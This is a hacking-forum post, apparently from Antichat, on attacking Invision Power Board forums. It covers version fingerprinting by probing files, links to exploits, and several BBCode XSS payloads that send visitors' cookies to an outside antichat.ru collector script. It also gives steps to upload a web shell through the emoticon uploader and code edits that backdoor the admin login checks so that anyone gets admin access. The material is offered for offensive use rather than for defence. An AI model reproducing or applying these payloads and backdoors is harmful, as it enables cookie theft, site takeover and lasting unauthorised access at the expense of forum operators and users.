Форум АНТИЧАТ - IPB Vulnerabilities Review

How to determine the forum version
version Invision Power Board 1.3
If there are such folders and files:
/html/emoticons/
/fonts/
/Skin/
/ssi_templates/
Such files:
ssi.php
show.php
css.php
conf_mime_types.php
version Invision Power Board 2.0.*
If there are such folders and files:
/sources/help.php
/sources/usercp.php
/sources/trial_functions.php
/sources/topics.php
/sources/taskloader.php
shows error 403 "access forbidden" for example to the folder
/ips_kernel/ as 403: Invision Power Board -> Forbidden
version Invision Power Board 2.1.*
If there are such folders and files:
/ips_kernel/PEAR/
Such files
info.php
shows 403 "accesses forbidden" for example to the folder
/ips_kernel/ as 403: Invision Power Board -> Forbidden
Exploits
Version Invision Power Board 1.3.1 _http://milw0rm.com/id.php?id=1036
Version Invision Power Board 1.* , 2.* (<2.0.4) _http://rst.void.ru/download/r57ipb2.txt
Version Invision Power Board 2.0.0 - 2.0.2 _http://milw0rm.com/id.php?id=648
Version Invision Power Board Army System Mod 2.1 _http://www.milw0rm.com/exploits/1492
Version Invision Power Board 2.1.4 (Dos) _http://www.milw0rm.com/id.php?id=1489
Version Invision Power Board <=2.1.5 (Remote code execution)
http://forum.antichat.ru/thread18222.html
XSS
Do not use these codes with a sign "*". It is used so that these codes won't work on this forum.

Код:

[ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Код:

[HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor][color=wh*ite]` style=`backg*round:url(javascript:docu*ment.images   [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]

Код:

[EMA*IL]mail@mail.com[U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]

Код:

[po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]

Код:

[em*ail]wj@wj.com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Код:

[COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)

Код:

[EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`

Load shell
Invision Power Board 1.3
Administration->Manage Emoticons->Upload an Emoticon to the emoticons directory
Usually shell is uploaded in one of these folders, depending on a version, if your access is enough
1.3 /forum/html/emoticons/shell.php
2.* /forum/style_emoticons/default/shell.php
where shell.php name your loaded shell
Trojaning the
forum
Invision Power Board 1.3

PHP код:


		
			
if ($GROUP['g_access_cp'] != 1)

{

do_login("You do not have access to the administrative CP");

}

else

{

$session_validated = 1;

$this_session = $row;

}

and change to

PHP код:


		
			
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)

{



$session_validated = 1;

$this_session = $row;

}

and search lines (by default 442 line)

PHP код:


		
			
if ($GROUP['g_access_cp'] != 1)

{

do_login("You do not have access to the administrative CP");

}

else

{



//----------------------------------

// All is good, rejoice as we set a

// session for this user

//----------------------------------



$sess_id = md5( uniqid( microtime() ) );

and change to

PHP код:


		
			
if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] = 1)



{



//----------------------------------

// All is good, rejoice as we set a

// session for this user

//----------------------------------



$sess_id = md5( uniqid( microtime() ) );

then we edit the file /sources/Admin/ad_mysql.php and delete lines

PHP код:


		
			
if ($MEMBER['mgroup'] != $INFO['admin_group'])

{

$ADMIN->error("Sorry, these functions are for the root admin group only");

}

Invision Power Board 2.0.*
/sources/action_admin/login.php
by default 147 line
and delete lines

PHP код:


		
			
if ($mem['g_access_cp'] != 1)

{

$this->login_form("You do not have access to the administrative CP");

}

else

{

and in a line (by default 206) delete character "}" naturally without quotation marks.
sql.php by default 46 line:
we delete

PHP код:


		
			
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])

{

$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");

}

then we go here
/sources/lib/admin_functions.php (line 262)
we change a line:

PHP код:


		
			
$this->ipsclass->admin_session['_session_validated'] = 0;

change to

PHP код:


		
			
$this->ipsclass->admin_session['_session_validated'] = 1;

then we delete lines in the file /sources/sql_mysql.php (by default 76 line)
[CODE]
if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
$this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}
[CODE]
Now we'll explain all this in details, when you call in admincp (not "troyaning"), verification of if ($GROUP['g_access_cp'] != 1) have you acces for admincp {
do_login("you do not have access to the administrative CP");
}
For the receipt of access it is necessary to change this line of if ($GROUP['g_access_cp'] != 1) to if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 )
--------------------
Thanks qBiN

Original version here: http://forum.antichat.ru/thread11615.html
by k1b0rg

[edit: some mistakes were corrected (too tired to look more), real copyrights added]